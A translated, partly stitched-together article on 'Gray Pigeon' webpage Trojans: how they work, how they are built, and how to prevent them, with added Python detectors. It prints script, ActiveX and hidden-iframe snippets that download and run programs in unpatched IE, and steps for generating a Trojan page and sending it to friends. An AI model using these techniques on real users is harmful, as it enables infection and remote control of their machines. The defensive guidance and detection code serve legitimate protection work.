The principle, production, and prevention of "gray pigeon" webpage Trojans (figure)

Source: Internet
Author: User

Everything has two sides. The webpage Trojan techniques introduced in this article are meant to strengthen everyone's awareness of prevention, not to encourage anyone to do harm. We hope to provide some help to you in creating a secure Internet access environment.

If you visit the xxx website (a portal website in China), you will get the Gray Pigeon Trojan. That is what a hacker told me. I opened the home page of the website and, after checking, found that I had indeed been hit. How was this achieved? He said that he had intruded into the server of the website and hung a webpage Trojan on the website's home page. Security experts often say that you should not open URLs sent by strangers. Why? Because the URL is likely to lead to a webpage Trojan specially crafted by a malicious user.

The above are only two types of webpage Trojans. In fact, webpage Trojans can also be planted in multimedia files (RM, RMVB, WMV, WMA, Flash), e-mails, forums, and other files and places. How can users protect themselves against webpage Trojans? Let's start with the principle of a webpage Trojan attack.

I. Webpage Trojan attack principles

First of all, be clear that a webpage Trojan is actually just an HTML webpage. Unlike other webpages, it has been carefully crafted by a hacker: once a user visits it, the user's machine is infected with a Trojan. Why "carefully crafted"? Because the scripts embedded in the page exploit vulnerabilities in the IE browser so that IE automatically downloads, in the background, the Trojan the hacker has placed on the network and then runs (installs) it. In other words, the page can download a Trojan to the local computer and run (install) it there, and the whole process happens in the background: as soon as the user opens the page, the download and the run (install) start automatically.

Some may ask: can the IE browser really download and run a program automatically just because a web page is opened? If IE could download and run programs without restriction, the world would be in chaos. In fact, for security reasons IE prohibits automatically downloading programs, and especially running them. However, IE has some known and unknown vulnerabilities, and webpage Trojans use these vulnerabilities to obtain permission to download and run programs. The following uses an early IE vulnerability to illustrate these two problems.

 ⒈ Automatically downloads the program

<script language="icyfoxlovelace" src=""></script>

Tip: Code Description

A. The "src" attribute in the code is the network address of the program. In this example.

B. You can also upload the Trojan program to a free home page, but for security reasons most free space does not allow exe files to be uploaded. Hackers may change the extension from exe to bat or com so that they can upload these programs to the server.

Insert this code between <BODY>...</BODY> in the source code of the webpage (Figure 1), and then open the page in an unpatched IE6. Next, open IE's temporary directory <Temporary Internet Files>. You will find a file named 1.exe in the folder. That is to say, this webpage has automatically downloaded the Gray Pigeon Trojan I placed on the Web server.

Figure 1 webpage Trojan example

  TIPS: Gray Pigeon Trojan

Why use the Gray Pigeon Trojan? Because Gray Pigeon is a reverse-connection ("bounce") Trojan, it can get past interception by most firewalls, such as Skynet. After infection, the server component actively connects to the control end (client); that is, once the infected machine is connected to the Internet, it automatically comes online at the control end (Figure 2).

Figure 2 Example of the Gray Pigeon control end (Khan! Another major drug lord :))

  ⒉ Automatically runs the program

<script language="javascript" type="text/javascript">
// Create the Shell.Application control and invoke the default verb (open) on Notepad.exe
var shell = new ActiveXObject("Shell.Application");
shell.NameSpace("c:\\Windows\\").Items().Item("Notepad.exe").InvokeVerb();
</script>

Insert this code between <BODY>...</BODY> in the source code of the webpage, and then open the webpage in IE. You will find that this code automatically opens Notepad in an IE6 without any patches.

This code uses the Shell.Application control. When the control is granted execute permission in a webpage, replacing the Notepad.exe (Notepad) program in the code lets it automatically run any program on the local computer.

The code above shows that by exploiting IE vulnerabilities, that is, by inserting the appropriate code into a webpage, IE can be made to download and run programs automatically. However, once the IE patches are installed, this code no longer works. In addition, because this code has to download and run programs, the webpage monitoring of some anti-virus software may treat it as a virus, so hackers may use tools to encrypt the source code of the webpage (Figure 3).

Figure 3 encrypted webpage code
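
The scripts described in this section can be looked for in a site's own pages. The following added example (not code from the original article) flags script tags with a non-standard language attribute and ActiveXObject calls for program-launching controls, after undoing unescape() wrapping and string concatenation as simple stand-ins for the "encryption" mentioned above. The function names, the sample page, the host name, and the wscript.shell entry are assumptions.

```python
import re
from urllib.parse import unquote

# "shell.application" is the ProgID the article uses; "wscript.shell" is an added assumption.
RISKY_PROGIDS = ("shell.application", "wscript.shell")
KNOWN_LANGS = ("javascript", "jscript", "vbscript", "ecmascript")

SCRIPT_TAG = re.compile(r"<script\b([^>]*)>", re.I)
ATTR = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)')""")
UNESCAPE = re.compile(r"""unescape\(\s*(["'])(.*?)\1\s*\)""", re.I | re.S)
CONCAT = re.compile(r"""(["'])\s*\+\s*\1""")
ACTIVEX = re.compile(r"""ActiveXObject\s*\(\s*["']([^"']*)["']""", re.I)

def js_unescape(s):
    """Approximate JavaScript unescape(): %uXXXX first, then %XX as Latin-1 bytes."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, encoding="latin-1")

def reveal(html, max_rounds=5):
    """Inline unescape("...") literals (possibly nested) and join "a" + "b" string pieces."""
    for _ in range(max_rounds):
        decoded = UNESCAPE.sub(lambda m: js_unescape(m.group(2)), html)
        if decoded == html:
            break
        html = decoded
    return CONCAT.sub("", html)

def scan_page(html):
    text, findings = reveal(html), []
    for raw_attrs in SCRIPT_TAG.findall(text):
        attrs = {k.lower(): (a or b) for k, a, b in ATTR.findall(raw_attrs)}
        lang = attrs.get("language", "").lower()
        if lang and not lang.startswith(KNOWN_LANGS):
            findings.append(("nonstandard-script-language", lang, attrs.get("src", "")))
    for progid in ACTIVEX.findall(text):
        name = progid.replace(" ", "").lower()
        if name in RISKY_PROGIDS:
            findings.append(("risky-activex", name, ""))
    return findings

# Constructed sample: the host is a placeholder; the second script hides its body in unescape().
SAMPLE = """<html><body>
<script language="icyfoxlovelace" src="http://files.example.test/1.exe"></script>
<script>document.write(unescape("%3Cscript%3Enew ActiveXObject(%22Shell.Appli%22 + %22cation%22)%3C/script%3E"));</script>
<script type="text/javascript">var total = 1 + 2;</script>
</body></html>"""

if __name__ == "__main__":
    print(*scan_page(SAMPLE), sep="\n")
```

Pattern matching of this kind only catches wrapping it knows how to undo, so treat a clean result as "nothing obvious found", not as proof that a page is safe.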

II. Basic usage of webpage Trojans

Once you understand the principle of webpage Trojan attacks, you could make a webpage Trojan yourself, but you would need to write exploit code for an IE vulnerability. In fact, many experts on the Internet have already written such exploit code, and some have packaged it into graphical programs. Enter "webpage Trojan generator" in a search engine and you will find many generators written around various IE vulnerabilities, most of them graphical programs. Given a Trojan (which must be placed on the network), such a generator immediately produces a webpage. That page is a webpage Trojan: as soon as someone opens it, it automatically downloads and runs (installs) the Trojan.

I have downloaded a webpage Trojan generator on my computer. Let's see how a webpage Trojan is generated and how others come to be infected by it.

Step 1: Start the webpage Trojan generator, as shown in Figure 4. Enter the network address of the Trojan in the text box and click "Generate".

Figure 4 webpage Trojan Generator

Step 2: A webpage file is generated in the installation folder of the webpage Trojan generator; this is the webpage Trojan produced in the previous step. Upload the file to your Web server or free home page space.

Now send the address (URL) of that page on the server to your friends via QQ. Once a friend opens the page, it automatically downloads and runs the Trojan from the network on his computer.

Now you should understand the true meaning of the security experts' advice, "Don't open network addresses from strangers"! In fact, even if nobody opened URLs from strangers, some people would still be "moths flying into the flame", because the Internet is so large that there will always be some who visit these pages, intentionally or not. Webpage Trojans are also hung on some well-known websites (given the traffic of a well-known website, you can work out how many people are infected every day!).

  TIPS: You may not expect that watching a movie, or viewing or replying to a post on a forum, could infect you. In fact, webpage Trojans can also be planted in multimedia files, e-mails, forums, and CHM e-books. Once a user watches the movie, views or previews the e-mail (mainly bulk-sent spam), takes part in the thread, or opens the e-book, the user is hit by the webpage Trojan.

Here we only describe how hackers hang webpage Trojans on well-known websites, using the following code:

<iframe src="" width="0" height="0" frameborder="0"></iframe>

  TIPS: The "src" attribute is the network address of the webpage Trojan uploaded to the server.

Insert this code between <BODY>...</BODY> in the source code of a portal's home page. On the surface, the home page does not change after the code is inserted, yet everyone who visits the home page will be infected with the Trojan. Why? Because the <iframe> tag in this code invisibly "includes" the webpage Trojan in the page into which the code is inserted.

<iframe> is also called the floating frame tag. It embeds one HTML webpage inside another to achieve a "picture-in-picture" effect (Figure 5), and the width, height, border size, and scroll bar of the embedded page can all be controlled. In the code above, width, height, and frameborder are all set to "0", so inserting the code into the portal's home page changes nothing visible. However, the embedded page is still actually opened, so its scripts for downloading and running the Trojan are executed as soon as the portal home page opens.

Figure 5 iframe tag example
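
A webmaster-side check for the hidden frame described above, as an added example that is not part of the original article: it parses a page and reports every iframe that is invisible (zero width or height, as in the article's code, plus CSS-hidden frames, which goes beyond the article's case) and notes when the src points off-site. The function names, the sample page, and the .test host names are assumptions made for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

# Inline-style patterns that hide an element (an addition to the article's width/height case).
HIDING_CSS = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)

def _is_zero(value):
    """True for '0', '0px', '0%'; False for missing or non-zero values."""
    m = re.fullmatch(r"\s*(\d+(?:\.\d+)?)\s*(px|%)?\s*", value or "")
    return bool(m) and float(m.group(1)) == 0

class HiddenIframeFinder(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":          # HTMLParser lowercases tag and attribute names
            return
        a = {k: (v or "") for k, v in attrs}
        reasons = []
        if _is_zero(a.get("width")) or _is_zero(a.get("height")):
            reasons.append("zero-size")
        if HIDING_CSS.search(a.get("style", "")):
            reasons.append("css-hidden")
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        if host and host != self.site_host and not host.endswith("." + self.site_host):
            reasons.append("off-site")
        # An invisible frame is the signal; an off-site source raises its priority.
        if "zero-size" in reasons or "css-hidden" in reasons:
            line, _ = self.getpos()
            self.findings.append({"line": line, "src": a.get("src", ""), "reasons": reasons})

def find_hidden_iframes(html, site_host):
    finder = HiddenIframeFinder(site_host)
    finder.feed(html)
    return finder.findings

# Constructed sample page; hosts are placeholders under the reserved .test TLD.
SAMPLE = """<html><body>
<iframe src="http://ads.portal.test/banner.html" width="468" height="60"></iframe>
<iframe src="http://other-host.test/page.htm" width="0" height="0" frameborder="0"></iframe>
<IFRAME SRC="/local/tracker.html" STYLE="display: none"></IFRAME>
</body></html>"""

if __name__ == "__main__":
    print(*find_hidden_iframes(SAMPLE, "portal.test"), sep="\n")
```

Run against the files on the Web server (or against a fetched copy of each page) and compare the findings with what the site's own templates are supposed to contain.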

Someone may ask how the code above gets inserted into the source code of the portal's home page. This is a good question. My own skills are limited and I cannot get into their servers to modify webpages. However, if hackers discover vulnerabilities on these servers and obtain webshell permission, modifying the site's webpages is as easy as creating a webpage locally.

Someone asked: is it easy to get webshell permission on a server? If you pay more attention to network security, you will often see news reports of one website or another being hacked and its home page modified.

Someone asked: "Portal servers have almost no vulnerabilities to find, but personal servers have many. Can you break into them?" I am not a hacker. According to the laws of the People's Republic of China, it is illegal to intrude into others' servers and tamper with the information on them. I hope everyone can jointly maintain network security.

In the past, anti-virus software sometimes raised alerts when you opened certain famous websites on the Internet; now you understand the reason. Some people post on these websites and read this article. I hope that you can think about it for those webmasters.

III. Webpage Trojan protection policies

Anti-virus software and a firewall alone are far from enough to prevent webpage Trojans: once a hacker uses a privately modified Trojan with a bounce (reverse-connection) port, one that has been individually disassembled and altered so that anti-virus software cannot identify it, anti-virus software and firewalls are helpless. The prevention of webpage Trojans should therefore start from their principle and stop them at the root.

  (I) Install security patches promptly

Webpage Trojans spread by exploiting IE vulnerabilities. Take the webpage Trojan generated by the Ice Fox Prodigal Son "webpage Trojan generator" as an example: such a page can bypass the security settings of IE. When a user connects to the page, it can download a Trojan and run (install) it in the background without an ordinary user noticing. Therefore, downloading and installing the latest security patches from the Microsoft website is an effective way to prevent webpage Trojans.

  (II) Rename or uninstall (unregister) the least secure ActiveXObject (IE plug-in)

Some ActiveX objects in the system can run EXE programs, such as the Shell.Application control in the "automatically runs the program" code in this article. Once these controls obtain execute permission in a webpage, they become a "hotbed" for running Trojans, so renaming or uninstalling them blocks the webpage Trojans that rely on them. However, ActiveX objects exist to serve applications, not attacks, and every control has its uses. Before renaming or uninstalling a control, confirm that you do not need it, or that removing it does no real harm.

Uninstall (unregister) ActiveXObject

Step 1: Click "Run" on the "Start" menu and enter "CMD" to open the Command Prompt window.

Step 2: Enter "regsvr32.exe shell32.dll /u /s" at the command prompt and press Enter to uninstall (unregister) the Shell.Application control.

If you want to use the control again, enter the "regsvr32.exe shell32.dll /i /s" command in the Command Prompt window to reinstall (register) it. In these commands, regsvr32.exe is the command for registering or unregistering OLE objects or controls, [/u] is the unregister parameter, [/s] is the quiet-mode parameter, and [/i] is the install parameter.

Rename ActiveXObject

Note that when you rename a control, both the control name and its CLSID (Class ID) must be changed, and changed completely. The following uses Shell.Application as an example.

Step 1: Open the Registry Editor and search for "Shell.Application". This finds two registry items: "{13709620-C279-11CE-A49E-444553540000}" and "Shell.Application".

Step 2: Change {13709620-C279-11CE-A49E-444553540000} to {13709620-C279-11CE-A49E-444553540001}. Make sure the new value does not duplicate any other CLSID in the system.

Step 3: Change "Shell.Application" to "Shell.Application_xxx". When you need the control later, you can call it normally by this name.

  (III) Raise the security level of IE, and disable scripts and ActiveX controls

According to my tests, the webpage Trojan generated by the Ice Fox Prodigal Son "webpage Trojan Professional Edition builder" can be blocked simply by raising the security level of IE or disabling scripts. As the attack principle shows, webpage Trojans use vulnerabilities in IE scripting and ActiveX controls to download and run Trojans. If we disable scripts and ActiveX controls, the download and the run are both prevented.

  TIPS: Disabling scripts and ActiveX controls will cause some web pages to lose functions and effects, so whether to disable them depends on your own security needs.

Step 1: Select "Tools> Internet Options" on the menu bar of IE browser to open the "Internet Options" dialog box.

Step 2: On the "Security" tab, for the Internet and Local intranet zones, move the slider to the highest level (Figure 6), or click "Custom Level" and disable scripts and ActiveX controls in the dialog box that appears.
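
The result of these two steps can be checked from a registry export. The following added example (not part of the original article) reads the per-zone IE settings from .reg text and lists every script or ActiveX action in the Internet and Local intranet zones that is not set to Disable. It assumes the standard Internet Settings\Zones registry layout and the URL action numbers 1200, 1201 and 1400; the function names and the sample export are constructed.

```python
import re

# URL action IDs stored under ...\Internet Settings\Zones\<zone>: 0 = enable, 1 = prompt, 3 = disable.
ACTIONS = {"1200": "Run ActiveX controls and plug-ins",
           "1201": "Initialize and script ActiveX controls not marked as safe",
           "1400": "Active scripting"}
ZONES = {"1": "Local intranet", "3": "Internet"}  # the two zones the article hardens
POLICY = {0: "enabled", 1: "prompt", 3: "disabled"}
KEY = re.compile(r"^\[.*\\Internet Settings\\Zones\\(\d)\]\s*$", re.I)
VALUE = re.compile(r'^"(\w+)"=dword:([0-9a-fA-F]{8})\s*$')

def parse_zones(reg_text):
    """Return {zone: {value_name: int}} from the text of a .reg export."""
    zones, current = {}, None
    for line in reg_text.splitlines():
        if line.startswith("["):
            m = KEY.match(line)
            current = zones.setdefault(m.group(1), {}) if m else None
        elif current is not None and (m := VALUE.match(line)):
            current[m.group(1)] = int(m.group(2), 16)
    return zones

def audit(reg_text):
    """List (zone, action, state) for every audited action that is not disabled."""
    zones, gaps = parse_zones(reg_text), []
    for zid, zname in ZONES.items():
        for aid, aname in ACTIONS.items():
            val = zones.get(zid, {}).get(aid)
            if val != 3:
                state = "not set" if val is None else POLICY.get(val, hex(val))
                gaps.append((zname, aname, state))
    return gaps

# Constructed export: Internet zone hardened, Local intranet zone left permissive.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1200"=dword:00000000
"1400"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1200"=dword:00000003
"1201"=dword:00000003
"1400"=dword:00000003
'''

if __name__ == "__main__":
    print(*audit(SAMPLE_REG), sep="\n")
```

Files exported by regedit are UTF-16, so read them with open(path, encoding="utf-16") before passing the text to audit().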
